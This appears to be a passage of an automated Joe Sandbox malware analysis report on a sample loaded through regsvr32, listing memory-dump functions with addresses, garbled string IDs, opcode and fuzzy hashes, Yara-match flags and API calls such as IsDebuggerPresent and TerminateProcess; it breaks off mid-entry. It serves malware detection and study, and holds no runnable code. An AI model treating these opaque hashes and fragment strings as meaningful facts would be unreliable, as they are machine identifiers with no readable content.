                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;U[$L$Q#
                                                                    • API String ID: 0-2933747092
                                                                    • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                    • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                    • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                    • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001DFB4 Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5($<:*$qwX
                                                                    • API String ID: 0-3944236288
                                                                    • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                    • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001C05C Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 79&$s`~$v;
                                                                    • API String ID: 0-3844292866
                                                                    • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                    • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000551C Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wQ_$1_$ac
                                                                    • API String ID: 0-1037425278
                                                                    • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                    • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180023831 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )K$U|$|1-
                                                                    • API String ID: 0-2543966960
                                                                    • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                    • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180029368 Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6|$6`d$H~z
                                                                    • API String ID: 0-1702722476
                                                                    • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                    • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019618 Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d~$`5$t>
                                                                    • API String ID: 0-1282322184
                                                                    • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                    • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000BB28 Relevance: 3.8, Strings: 3, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #St$JYr$hmn
                                                                    • API String ID: 0-1556749129
                                                                    • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                    • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002610 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TGA$K$W}
                                                                    • API String ID: 0-588348707
                                                                    • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                    • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000738C Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :1,$@H${C=
                                                                    • API String ID: 0-2737386091
                                                                    • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                    • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001481C Relevance: 3.8, Strings: 3, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: prP$q<C$uL
                                                                    • API String ID: 0-1414207395
                                                                    • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                    • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180006458 Relevance: 3.8, Strings: 3, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :00D$Kl$(R'
                                                                    • API String ID: 0-3661897330
                                                                    • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                    • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B5944 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FF8CA9B597E
                                                                      • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
                                                                      • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
                                                                      • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
                                                                      • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
                                                                      • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
                                                                      • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID: C
                                                                    • API String ID: 1583075380-1037565863
                                                                    • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction ID: f85f2f3bdbabe30ddcc5124bbb58825ed04916ba3a6f7c1b4db96dff09f70cb9
                                                                    • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction Fuzzy Hash: 83518352A1879281EB709E22B57A7BB6690FB84BC4F448071DE6ED7A85DE3DD009C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC6E4 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction ID: fee33269eee20fbe8948e4c8b72289fbe9e07b27ec27074a0ed4289a4dffebfd
                                                                    • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction Fuzzy Hash: BE217F32B0878296EB289F25F95A3EA73A0FB88786F004171C62DC7685DF3CE0588740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC2B4 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction ID: ecfa9cafcc32be1e4ff600cfb302d441cd7b2f0f13508fe807f79b2839146d32
                                                                    • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction Fuzzy Hash: 15216D32B08B8196DB28CF60F45A3AA73A0FB89B84F844175DA6D87394DF3CE558C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800264F0 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$Y}
                                                                    • API String ID: 0-941771097
                                                                    • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                    • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180018148 Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 7;}~$?C
                                                                    • API String ID: 0-2633536567
                                                                    • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                    • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180025DAC Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5"*$Wu
                                                                    • API String ID: 0-3407213400
                                                                    • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                    • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180026B10 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F/|$]M
                                                                    • API String ID: 0-4182351379
                                                                    • Opcode ID: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                    • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                    • Opcode Fuzzy Hash: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                    • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180021C3C Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;SH$nK
                                                                    • API String ID: 0-1681473137
                                                                    • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                    • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800014F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$z
                                                                    • API String ID: 0-3532108746
                                                                    • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                    • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001A460 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g/?$~l;
                                                                    • API String ID: 0-1448562259
                                                                    • Opcode ID: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                    • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                    • Opcode Fuzzy Hash: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                    • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000F128 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JM$S
                                                                    • API String ID: 0-422059844
                                                                    • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                    • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000671C Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \4t$sT>
                                                                    • API String ID: 0-514966222
                                                                    • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                    • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800075D4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6 zT$lh
                                                                    • API String ID: 0-3667112246
                                                                    • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                    • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                    • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
